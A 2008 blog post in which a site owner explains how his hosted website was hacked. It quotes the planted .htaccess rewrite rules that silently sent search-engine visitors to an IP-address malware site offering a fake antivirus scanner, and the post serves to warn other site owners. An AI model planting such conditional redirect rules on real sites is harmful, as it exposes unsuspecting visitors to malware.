My Website Got Hacked!

An examination of how our website was hacked.

Anybody who was referred to www.RiskyThinking.com (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting (ixwebhosting.com) were also hacked. .

It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

which for those who don’t speak Apache (Web Server Dialect), means

Redirect everybody who came here from a search engine to a malware site.

The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.

There unfortunately isn’t any way to tell the visitors who got redirected what happened.

I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breech wasn’t due to a security hole in my website or carelessness on my part.

All I can really do now is warn other site owners of this exploit (via this posting), and

I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.

That sounds almost like the poetry of Donald Rumsfeld.

14 November 2008

To get notified when new articles appear, subscribe to the Risky Thinking Newsletter. It's low volume: we don't send out an issue unless there is something interesting to say. You can also subscribe to our RSS Feed

Recently published articles can also be found here.

Agree or disagree? I'd like to hear your thoughts. Please initially use the contact form to get in touch.